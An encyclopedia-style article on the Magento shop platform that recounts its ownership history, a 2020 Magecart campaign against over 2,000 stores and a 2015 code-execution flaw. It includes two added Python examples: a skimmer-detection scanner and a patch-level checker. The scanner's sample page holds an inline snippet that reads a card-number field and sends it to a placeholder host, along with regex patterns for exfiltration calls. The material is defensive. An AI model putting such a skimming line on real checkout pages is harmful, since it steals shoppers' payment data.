Developers: Magento Inc.
Last release date: 2014/12/15
Technology: CMS - Content management systems
Magento is a popular management system for online stores worldwide, including in the enterprise segment. In June 2011 Magento Inc. was acquired by eBay Inc. On May 21, 2018 Adobe announced the acquisition of Magento for $1.68 billion. The deal will allow the buyer to compete better with the e-commerce market leaders Salesforce.com and Oracle.
Magento is a multifunctional, professional open-source e-commerce solution that gives full control over the appearance, content and functionality of an online store. Its intuitive administration panel contains powerful tools for marketing, SEO and product catalog management, allowing companies to build their website around their own preferences and business requirements.
Magento has 150,000 clients, 6,400 modules, 800,000 associates and 4 million downloads of the Magento Community platform (data as of summer 2014).
2020: Hacking of 2,000 online stores
On September 14, 2020 it became known of a large-scale hacking campaign in which over 2,000 online stores built on Magento were compromised within two days.
The attacks on the stores followed the typical Magecart scheme: the attackers compromise the websites and then inject malicious scripts into the shops' source code. The script intercepts all data the user enters into the corresponding fields at checkout and sends it to the attackers' server.
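One way to look for the injected checkout scripts described above, as an added example that is not part of the original article or of SanSec's scanner: a Python heuristic that parses a store page, flags scripts loaded from hosts outside a first-party allowlist, and flags inline scripts that both reference payment fields and contain a network-send primitive. The allowlist, the field-name patterns and the sample page are constructed assumptions.

```python
"""Heuristic scan of a checkout page for injected payment-skimming scripts.

Added example; not the article's or SanSec's code. The first-party host
allowlist, the payment-field name patterns and SAMPLE_PAGE are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the store legitimately serves scripts from (assumed allowlist).
FIRST_PARTY_HOSTS = {"shop.example", "static.shop.example"}

# Names of checkout inputs a skimmer would read (assumed patterns).
PAYMENT_FIELD_RE = re.compile(
    r"card[_-]?number|cc[_-]?(?:num|number|cid|exp)|cvv|cvc", re.I)
# Primitives commonly used to send data out of the page.
EXFIL_RE = re.compile(
    r"new\s+Image\s*\(|XMLHttpRequest|\bfetch\s*\(|sendBeacon|\.src\s*=\s*['\"]https?:",
    re.I)


class _ScriptCollector(HTMLParser):
    """Collects every <script> element with its src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # Only text between <script> and </script> is of interest.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def extract_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def scan_page(html, allowed_hosts=FIRST_PARTY_HOSTS):
    """Return one finding dict {index, kind, detail} per suspicious script."""
    findings = []
    for index, script in enumerate(extract_scripts(html)):
        if script["src"]:
            host = urlparse(script["src"]).hostname or ""
            # Relative URLs have no host and are treated as first-party.
            if host and host not in allowed_hosts:
                findings.append({"index": index, "kind": "external-script",
                                 "detail": host})
        else:
            field = PAYMENT_FIELD_RE.search(script["body"])
            send = EXFIL_RE.search(script["body"])
            if field and send:
                findings.append({"index": index, "kind": "inline-skimmer-pattern",
                                 "detail": "%s + %s" % (field.group(0), send.group(0))})
    return findings


# Constructed checkout page: two legitimate scripts, one inline snippet that
# mimics an injected skimmer (inert here: no DOM, host does not resolve),
# one external third-party script, and one harmless inline config script.
SAMPLE_PAGE = """<html><head>
<script src="/js/varien/form.js"></script>
<script src="https://static.shop.example/js/checkout.js"></script>
<script>
  var n = document.getElementById('cc_number').value;
  new Image().src = 'https://stats-collector.invalid/p?d=' + encodeURIComponent(n);
</script>
<script src="https://stats-collector.invalid/lib.js"></script>
<script>var checkoutConfig = {step: 'payment'};</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
```

The scan is deliberately a heuristic: a skimmer that is obfuscated or split across files will not match the inline pattern, so the external-host check against a maintained allowlist (and, on the server side, a Content Security Policy that enforces the same list) is the more robust of the two signals.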
"On Friday 10 shops were infected, then 1,058 on Saturday, 603 on Sunday and 233 today," said Willem de Groot, founder of Sanguine Security (SanSec), a Dutch cyber security firm specializing in tracking Magecart attacks, commenting on the Magento incident on September 14, 2020.
Meanwhile, SanSec experts have not established exactly how the hackers compromised the affected websites, but Willem de Groot noted that in August 2020 an advertisement for a zero-day vulnerability in Magento 1.x appeared on hacker forums, which suggests the hackers were waiting for the right moment. In the advertisement someone under the nickname z3r0day offered an RCE exploit for $5,000.
SanSec also noted that most of the hacked websites ran the outdated Magento 1.x, whose support finally ended on June 30, 2020. In addition, in 2019 cybersecurity specialists predicted growth in attacks on Magento 1.x, fearing that between 200,000 and 240,000 sites could end up vulnerable. Since then the number of vulnerable sites has nevertheless decreased; as of mid-September 2020 it stands at about 95,000.
"This automated campaign is certainly the largest campaign Sansec has detected since it began monitoring in 2015," de Groot added.
The previous record was 962 hacked shops in one day (the incident occurred in July 2019).[1]
2015: Critical vulnerability detected in Magento
On April 22, 2015 it became known that a critical vulnerability had been detected in the open-source e-commerce platform Magento[2].
(Image: Magento control panel, 2015)
In February 2015 a critical vulnerability was discovered that allows an attacker to execute arbitrary PHP code on the server and gain full access to the online store's data, including customers' credit card information. The attack can be carried out while bypassing authentication. The problem is present in a core module of the Magento engine and manifests in default configurations.
The code fix was delivered in the SUPEE-5344 update; because of a nondisclosure agreement, information about the vulnerability was published only now (on April 22, 2015).
Magento releases and patches are delivered separately, i.e. the user has to install a release and then monitor for and apply patches as they appear. Many Magento users judge how up to date their system is by the version number alone and do not bother to install the corrective patches, which leaves their systems potentially vulnerable. For example, the Magento 1.9.1.0 release available as of April 22, 2015 does not include the fixes.
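The point that the version number says nothing about applied patches can be checked mechanically. The following Python script is an added example and not Magento's own tooling: it reads the version from the getVersionInfo() array in app/Mage.php, collects the SUPEE identifiers recorded in app/etc/applied.patches.list (the file Magento 1 patch scripts append to), reports which of a required set are missing, and also flags a 1.x install as past the June 30, 2020 end of support named earlier on this page. The regex over Mage.php, the line layout of the patch list and both sample files are constructed assumptions.

```python
"""Check a Magento 1 install for an applied SUPEE patch instead of trusting
the version number alone.

Added example, not Magento's tooling. Assumptions: the version is read by
matching the getVersionInfo() array in app/Mage.php (regex below); applied
patches are recorded one per line in app/etc/applied.patches.list; the
sample contents of both files are constructed.
"""
import re
from datetime import date

# End of support for Magento 1.x, as stated in the article.
MAGENTO1_EOL = date(2020, 6, 30)

PATCH_ID_RE = re.compile(r"\bSUPEE-\d+\b")


def parse_version(mage_php_source):
    """Assemble 'major.minor.revision.patch' from getVersionInfo() in app/Mage.php."""
    parts = []
    for key in ("major", "minor", "revision", "patch"):
        match = re.search(r"'%s'\s*=>\s*'(\d+)'" % key, mage_php_source)
        if match is None:
            raise ValueError("version field %r not found in Mage.php" % key)
        parts.append(match.group(1))
    return ".".join(parts)


def parse_applied_patches(listing):
    """Return the set of SUPEE identifiers mentioned in applied.patches.list."""
    return set(PATCH_ID_RE.findall(listing))


def assess(mage_php_source, listing, required_patches, today):
    """Report version, applied and missing patches, and whether 1.x is past EOL."""
    version = parse_version(mage_php_source)
    applied = parse_applied_patches(listing)
    return {
        "version": version,
        "applied": sorted(applied),
        "missing": sorted(set(required_patches) - applied),
        "eol": version.startswith("1.") and today > MAGENTO1_EOL,
    }


# Constructed fragment of app/Mage.php for a 1.9.1.0 install.
SAMPLE_MAGE_PHP = """
    public static function getVersionInfo()
    {
        return array(
            'major'     => '1',
            'minor'     => '9',
            'revision'  => '1',
            'patch'     => '0',
            'stability' => '',
            'number'    => '',
        );
    }
"""

# Constructed applied.patches.list: an older patch only (SUPEE-5344 missing)...
SAMPLE_LIST_UNPATCHED = (
    "2015-02-10 09:12:44 UTC | SUPEE-1533 | CE_1.9.1.0 | v1 | 0b1c2d | patch\n"
)
# ...and the same file after SUPEE-5344 has been applied.
SAMPLE_LIST_PATCHED = SAMPLE_LIST_UNPATCHED + (
    "2015-04-23 14:02:10 UTC | SUPEE-5344 | CE_1.9.1.0 | v1 | 3e4f5a | patch\n"
)

if __name__ == "__main__":
    print(assess(SAMPLE_MAGE_PHP, SAMPLE_LIST_UNPATCHED, ["SUPEE-5344"], date(2015, 4, 22)))
    print(assess(SAMPLE_MAGE_PHP, SAMPLE_LIST_PATCHED, ["SUPEE-5344"], date(2020, 9, 14)))
```

Both sample runs report version 1.9.1.0; only the patch list distinguishes the unpatched install from the patched one, which is exactly why version-based inventory misses these systems.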
As of April 22, 2015 more than 240 thousand online stores run on the Magento platform.